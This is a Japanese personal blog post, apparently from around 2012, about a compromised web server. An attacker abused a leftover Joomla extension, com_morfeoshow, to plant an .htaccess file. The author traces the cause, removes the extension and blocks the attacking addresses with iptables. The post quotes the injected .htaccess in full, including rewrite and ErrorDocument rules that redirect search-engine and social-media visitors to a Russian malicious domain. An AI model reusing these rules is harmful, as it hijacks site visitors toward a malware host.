昨日の午前中に、Twitterのタイムラインを見てて、ひとつのニュースがふと目に留まった。

≫ WordPressサイトの.htaccessが改ざんされている件 - CGI版PHPの脆弱性？謎のindex.bak.php | WP SEOブログ

自分のサイトでは、まだWordPressを使ってないけど、一応チェックしとくかと思って調べてみた。

そしたら、上のブログで書かれてる内容とは違うけど、.htaccess が改竄というか、もともと置いてなかったのに、勝手に作成されてるではないか！

この↓内容で .htaccess が作られてた。Joomla!のサイトは既にあるので、ファイルの先頭に挿入されてた。
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://narm-klast.ru/wptwitt?3 [R=301,L] ErrorDocument 401 http://narm-klast.ru/wptwitt?3 ErrorDocument 403 http://narm-klast.ru/wptwitt?3 ErrorDocument 404 http://narm-klast.ru/wptwitt?3 ErrorDocument 500 http://narm-klast.ru/wptwitt?3

最初、CMSを使ってない static なサイト上 http://www.satoshis.com/ で発見したので、apache の脆弱性を突かれたのかな？とか思い、apache を最新版の 2.2.22 にアップデートした。

これで大丈夫かな、と .htaccess を削除して様子を見てたら、1時間もしないうちに同じような .htaccess が作られてた。last してみたけど不正なログインはないし、ps しても変なプロセスは見当たらないので、何かのサービス経由で来てるんだろうと判断。

httpd のログを見ると、ロシアとか韓国とか中国のアドレスから、不思議なパラメーター付きのアクセスがあるのを発見。でも、htacces って文字列は見当たらず。

いろいろと調べてみると、なぜか staticなhtmlを置いてるバーチャルホストと、Joomla のバーチャルホストのディレクトリにだけ .htaccess が作られてるっぽいことが分かった。

もしかして、Joomlaの脆弱性？

この際だから、Joomlaも 1.5 ベースの最新版 1.5.22 にアップデートしてみた。が、まだ改竄が続いてる。定期的に IE8 でアクセスしてきて、.htaccess を作成したり書き換えたりしてくれてる。

httpd のアクセスログを調べると、どうやら Joomla! の解説サイトを利用してるらしい。Joomla!の解説サイトって、いろいろとエクステンションを入れてるから、エクステンションに脆弱性があるのかもしれない。アクセス先URLを調べると、com_morfeoshow ってエクステンションにアクセスするときに、長くて変なパラメーターが渡されてた。

確認したけど、そのエクステンションは現状では使ってなくて、Joomla!のシステム上ではアンインストール済になってた。

# mv -R com_morfeoshow ~/backup

こうしたら、それ以降は .htaccess が作成されたり改竄されたりすることはなくなった。

でも、ひたすら同じURLに対してアクセスを続けてるらしく、エラーログに404が次々に積み上げられていく。

# iptables -A INPUT -s アクセス元ドメイン/16 -j DROP

ブロックして、やっと平和が訪れた。